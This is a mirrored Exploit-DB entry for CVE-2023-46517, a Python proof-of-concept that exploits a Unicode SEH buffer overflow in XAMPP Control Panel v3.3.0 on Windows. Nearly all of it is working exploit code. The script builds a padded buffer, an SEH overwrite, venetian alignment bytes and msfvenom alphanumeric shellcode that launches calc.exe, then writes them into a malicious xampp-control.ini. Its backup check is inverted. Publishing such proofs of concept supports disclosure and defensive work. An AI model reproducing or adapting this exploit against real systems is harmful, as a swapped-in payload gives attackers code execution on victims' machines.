XAMPP – Buffer Overflow POC

• Exploit Database
• 13 阅读

• 作者： Talson
  日期： 2024-02-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51800/

• # Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
  # Date: 2023-10-26
  # Author: Talson (@Ripp3rdoc)
  # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
  # Version: 3.3.0
  # Tested on: Windows 11
  # CVE-2023-46517
  
  ##########################################################
  # _________ _______________________#
  # \__ __/(___)( \(____ \(___)( (/| #
  #) ( | ( ) || (| (\/| ( ) ||\( | #
  #| | | (___) || || (_____ | | | || \ | | #
  #| | |___|| |(_____)| | | || (\ \) | #
  #| | | ( ) || |) || | | || | \ | #
  #| | | ) ( || (____/\/\____) || (___) || )\| #
  #)_( |/ \|(_______/\_______)(_______)|/)_) #
  ##
  ##########################################################
  
  # Proof-of-Concept Steps to Reproduce :
  
  # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
  # 2.- Open the application (xampp-control.exe)
  # 3.- Click on the "admin" button in front of Apache service.
  # 4.- Profit
  
  # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
  
  # Greetingz to EMU TEAM (¬‿¬)⩙
  
  from pwn import *
  import shutil
  import os.path
  
  buffer= "\x41" * 268# 268 bytes to fill the buffer
  nseh= "\x59\x71"# next SEH address— 0x00590071 (a harmless padding)
  seh = "\x15\x43"# SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
  padd= "\x71" * 0x55 # padding
  
  eax_align = "\x47" 		# venetian pad/align
  eax_align +="\x51"# push ecx
  eax_align +="\x71" 		# venetian pad/align
  eax_align +="\x58"		# pop eax -> eax = 0019e1a0
  eax_align +="\x71" 		# venetian pad/align 
  eax_align +="\x05\x24\x11"# add eax,0x11002300
  eax_align +="\x71" 		# venetian pad/align
  eax_align +="\x2d\x11\x11"# sub eax,0x11001100-> eax = 0019F3DC
  eax_align +="\x71" 		# venetian pad/align
  eax_align +="\x50" 		# push eax 
  eax_align +="\x71"		# pad to align the following ret
  eax_align +="\xc3";		# ret into eax?
  
  # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
  # Payload size: 512 bytes
  shellcode = (
  "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
  "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
  "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
  "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
  "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
  "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
  )
  
  shellcode = buffer + nseh + seh +eax_align + padd + shellcode
  
  
  check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")
  
  if check_file:
  
  print("[!] Backup file found. Generating the POC file...")
  pass
  else:
  # create backup
  try:
  shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
  print("[+] Creating backup for xampp-control.ini...")
  print("[+] Backup file created!")
  except Exception as e:
  print("[!] Failed creating a backup for xampp-control.ini: ", e)
  
  try:
  
  # Create the new file
  with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
  file.write(f"""[Common]
  Edition=
  Editor=
  Browser={shellcode}
  
  Debug=0
  Debuglevel=0
  Language=en
  TomcatVisible=1
  Minimized=0
  
  [LogSettings]
  Font=Arial
  FontSize=10
  
  [WindowSettings]
  Left=-1
  Top=-1
  Width=682
  Height=441
  
  [Autostart]
  Apache=0
  MySQL=0
  FileZilla=0
  Mercury=0
  Tomcat=0
  
  [Checks]
  CheckRuntimes=1
  CheckDefaultPorts=1
  
  [ModuleNames]
  Apache=Apache
  MySQL=MySQL
  Mercury=Mercury
  Tomcat=Tomcat
  
  [EnableModules]
  Apache=1
  MySQL=1
  FileZilla=1
  Mercury=1
  Tomcat=1
  
  [EnableServices]
  Apache=1
  MySQL=1
  FileZilla=1
  Tomcat=1
  
  [BinaryNames]
  Apache=httpd.exe
  MySQL=mysqld.exe
  FileZilla=filezillaserver.exe
  FileZillaAdmin=filezilla server interface.exe
  Mercury=mercury.exe
  Tomcat=tomcat8.exe
  
  [ServiceNames]
  Apache=Apache2.4
  MySQL=mysql
  FileZilla=FileZillaServer
  Tomcat=Tomcat
  [ServicePorts]
  Apache=80
  ApacheSSL=443
  MySQL=3306
  FileZilla=21
  FileZill=14147
  Mercury1=25
  Mercury2=79
  Mercury3=105
  Mercury4=106
  Mercury5=110
  Mercury6=143
  Mercury7=2224
  TomcatHTTP=8080
  TomcatAJP=8009
  Tomcat=8005
  [UserConfigs]
  Apache= 
  MySQL=
  FileZilla=
  Mercury=
  Tomcat=
  
  [UserLogs]
  Apache=
  MySQL=
  FileZilla=
  Mercury=
  Tomcat=
  """)
  print("[+] Created the POC!")
  
  except Exception as e:
  print("[!] Failed creating the POC xampp-control.ini: ", e)